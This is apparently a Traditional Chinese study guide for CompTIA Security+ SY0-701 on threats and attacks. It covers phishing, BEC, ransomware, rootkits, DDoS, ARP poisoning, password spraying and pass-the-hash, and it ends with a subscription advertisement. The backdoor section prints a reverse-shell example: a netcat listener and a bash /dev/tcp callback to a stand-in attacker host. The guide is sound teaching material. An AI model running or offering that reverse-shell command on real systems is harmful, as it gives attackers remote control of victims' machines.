CompTIA SY0-701: 威脅、攻擊與弱點 — 學習指南

屬於 CompTIA Security+ SY0-701 — 學習指南. 使用經過驗證的解答練習: CompTIA 考試中心, 或參加限時模擬考試: ExamRoll.io.

現今的威脅情勢,其特點在於攻擊者會結合技術漏洞利用與人性操控、將多個低嚴重性的弱點串連成高衝擊的入侵事件,並將其活動偽裝在合法的商業流程中。要了解威脅,首先必須了解其意圖、能力與途徑——並且不能將表面症狀當作事件的全貌。

社交工程與釣魚變種

社交工程利用的是信任、急迫性、權威或好奇心,而非軟體漏洞。傳統的 釣魚 (phishing) 透過電子郵件廣泛撒網,向數千名收件人發送如假的貨運通知或密碼重設請求等通用誘餌。魚叉式釣魚 (Spear phishing) 則縮小範圍,利用從 LinkedIn、公司網站或外洩資料中偵察到的資訊,製作針對特定個人或部門的客製化訊息。鯨釣 (Whaling) 鎖定高階主管——財務長收到一封偽裝成來自外部法律顧問的訊息,就是典型的目標——因為他們的權限能造成更高衝擊的詐騙。

管道變體將同樣的操控手法延伸到其他媒介。語音釣魚 (Vishing) 使用電話,通常會偽造來電顯示並假冒身份(例如冒充 IT 服務台)來騙取 MFA 驗證碼。簡訊釣魚 (Smishing) 使用簡訊,經常利用短網址和針對手機的誘餌(「您的包裹無法送達——請點此重新安排」)。由於手機瀏覽器會截斷網址並隱藏憑證細節,簡訊釣魚的成功率異常地高。

商務電子郵件詐騙 (BEC) 值得特別關注,因為它通常完全不涉及惡意軟體。攻擊者可能入侵了合法的信箱,或偽造了相似的網域(例如 accounts@vend0r-corp.com 而非 accounts@vendor-corp.com),然後將自己插入到真實的發票郵件串中,並將電匯轉帳導向其他地方。由於郵件內容在情境上是準確的,且沒有任何附件,閘道端的反惡意軟體和 URL 沙箱幾乎無法提供保護。FBI 的 IC3 報告指出,BEC 在一年內造成的損失超過 29 億美元,使其成為迄今為止金額最高的網路犯罪類別。

一個常見的陷阱是過度解讀看似無害的症狀。當使用者在釣魚網站上提交憑證後收到「找不到頁面」的錯誤時,事件並未結束——這其實是一次已完成的憑證竊取,攻擊者在捕獲資料後將受害者重新導向了。沒有明顯的錯誤頁面是攻擊的一個特點,而不是攻擊失敗的證據。

惡意軟體類型

惡意軟體並非單一類型。勒索軟體 (Ransomware) 會加密資料並要求贖金,而現代變種如 Ryuk、Conti 和 LockBit 還會先竊取資料,以進行雙重勒索。一個明顯的指標是大量檔案的副檔名被更改——檔案被重新命名為 .ryk.locked 或隨機字串——並在每個目錄中都留下了名為 README.txtHOW_TO_DECRYPT.html 的勒索信。

Rootkits 在更深層次運作,透過掛鉤 (hook) 核心結構、系統呼叫表或韌體 (bootkits、UEFI 植入物),來對作業系統本身隱藏處理程序、檔案和網路連線。由於標準工具查詢的是被 rootkit 控制的核心,因此 tasklistps 的輸出無法信任;偵測通常需要離線進行鑑識映像分析,或透過 chkrootkit 等工具與已知的良好基線進行比較,或使用 Volatility 進行記憶體分析。

後門 (Backdoors) 提供持續性的未經授權存取,通常在初次入侵後安裝。它們的形式可能是一個定期向命令與控制 (C&C) 伺服器回報的排程任務、一個被硬編碼在應用程式中的憑證,或是一個在不常用連接埠上監聽的服務。使用像 Netcat 或 Meterpreter 這類工具建立的反向 shell (reverse shell) 是典型手法:

# Attacker listener
nc -lvnp 4444

# Victim callback (dropped by malware)
bash -i >& /dev/tcp/attacker.example/4444 0>&1

這裡的陷阱是檢傷分類時的視野狹隘。一個標示為「偵測到惡意軟體」並被迅速隔離的警報,不代表事件已經結束——最初的投放程式 (dropper) 可能已經建立了後門或安裝了端點代理程式無法看到的 rootkit。

網路攻擊

分散式阻斷服務 (DDoS) 攻擊的目標是可用性。流量型 (Volumetric) 攻擊——如 UDP 洪水、ICMP 洪水——會耗盡原始頻寬。反射/放大 (Reflected/amplified) 攻擊濫用第三方服務,使其回應比請求更大的酬載;一個 60 位元組、帶有偽造來源位址的 DNS 查詢,可以返回一個 3,000 位元組的回應,而 NTP monlist 或 memcached 的放大攻擊可以達到超過 50,000 倍的比率。當公開的 Web 服務在伺服器上仍然「正常運作」,但從網際網路上無法連線,且網路日誌顯示流量激增時,答案幾乎總是 DDoS 攻擊飽和了上游鏈路或狀態表——而不是應用程式的錯誤。

路徑中攻擊 (On-path attacks) (以前稱為「中間人攻擊」) 將攻擊者置於兩個通訊方之間。在區域網路上,ARP 毒化 (ARP poisoning) 是常見的機制:攻擊者發送未經請求的 ARP 回應,聲稱自己擁有閘道器的 IP,這樣受害者的流量就會被靜默地路由到攻擊者的主機。像 ettercaparpspoof 這類的工具可以自動化此過程,之後攻擊者便能用 sslstrip 剝離 TLS 或注入內容。

域名仿冒 (Typosquatting) 註冊模仿合法網域的名稱 (goggle.com, paypa1.com),以捕捉打錯的網址,或作為釣魚和 BEC 的可信基礎設施。

憑證攻擊

憑證攻擊並非利用程式碼漏洞,而是利用薄弱的驗證機制。暴力破解 (Brute force) 會針對單一帳戶嘗試所有可能的密碼,這種方式動靜很大,容易觸發帳戶鎖定策略。密碼噴灑 (Password spraying) 則反其道而行:它會用一兩個非常常見的密碼(例如 Winter2024!Password123)去嘗試數千個帳戶,確保對任何單一帳戶的嘗試次數都低於鎖定閾值。這種攻擊對於那些未在雲端身分提供者上啟用 MFA 的組織特別有效。

憑證填充 (Credential stuffing) 則是重放從先前外洩事件中收集到的使用者名稱/密碼組合,利用使用者在不同服務間重複使用密碼的習慣。由於這些憑證在至少一個服務上是有效的,因此它們可以繞過基本的驗證控制。2022 年的 Okta 外洩事件就是從針對一個支援承包商帳戶的憑證填充攻擊開始的——這證明了即使是身分提供者,若未在每個特權存取路徑上強制執行 MFA,也無法倖免。

傳遞雜湊 (Pass-the-hash)傳遞票證 (Pass-the-ticket) 攻擊是從記憶體中竊取驗證材料,而不是破解密碼。在 Windows 系統上,儲存在 LSASS 記憶體中的 NTLM 雜湊值可以被 Mimikatz 等工具提取出來,並在不知道明文密碼的情況下,重放以驗證到其他系統。同樣地,Kerberos 的票證授予票證 (TGTs) 也可能被竊取和重複使用。緩解措施包括啟用 Credential Guard(它將 LSASS 隔離在一個基於虛擬化的安全隔離區中)、將使用者加入 Protected Users 安全群組,以及在可以使用 Kerberos 的地方停用 NTLM。

實務情境:透過密碼噴灑發動的勒索軟體攻擊

一家擁有 2,400 名員工的物流公司,並未在其 Microsoft 365 租戶上強制啟用 MFA。一名攻擊者花了三天時間進行密碼噴灑攻擊,用密碼 Summer2023! 測試所有從 LinkedIn 上收集到的已知電子郵件地址。結果有 41 個帳戶的密碼匹配成功。攻擊者利用其中一個被入侵的帳戶——一名區域經理的帳戶——存取了公司的 VPN,該 VPN 接受 M365 憑證登入。從 VPN 進入後,攻擊者花了兩週時間進行內部偵察,識別出備份伺服器和網域控制器。在一個週五的晚上,LockBit 勒索軟體在 340 台伺服器上被引爆。災難復原花了 19 天,總成本約 410 萬美元,包括贖金、鑑識費用和營收損失。整個攻擊鏈的成功,只因一個失控的環節:M365 租戶上未啟用 MFA。密碼噴灑攻擊是可以被偵測的——只要在 SIEM 中設定一條規則,將來自單一 IP 針對多個帳戶的大量驗證失敗事件關聯起來,就能在攻擊的第一天就標記出異常。



身分與存取管理 · 所有領域 · 網路安全與架構

練習這些題目 → · 在 ExamRoll.io 上限時練習 →

Pass the whole exam — not just this question

You found this answer. Get every verified question and explanation in one place, and save hours of prep. Free to start.

通過考試 →

Related guides

一站式存取

一份訂閱。所有考試。

每個方案都可無限存取答案搜尋、練習測驗、AI 解釋和完整的資源庫 — 支援 20 多種語言。

每月
24.87
Just €0.83/day
包含所有內容:
  • 無限答案搜尋
  • 無限練習測驗
  • AI 驅動的解釋
  • 完整資源庫
  • 20 多種語言
  • 每週內容更新
  • 獎勵與推薦
  • 優先支援
開始免費試用

無需信用卡*

最佳價值
12 個月
179.87
Just €0.49/daySave 40%
包含所有內容:
  • 無限答案搜尋
  • 無限練習測驗
  • AI 驅動的解釋
  • 完整資源庫
  • 20 多種語言
  • 每週內容更新
  • 獎勵與推薦
  • 優先支援
開始免費試用

無需信用卡*

✓ 包含免費方案 · ✓ 隨時取消 · ✓ 所有方案解鎖完整產品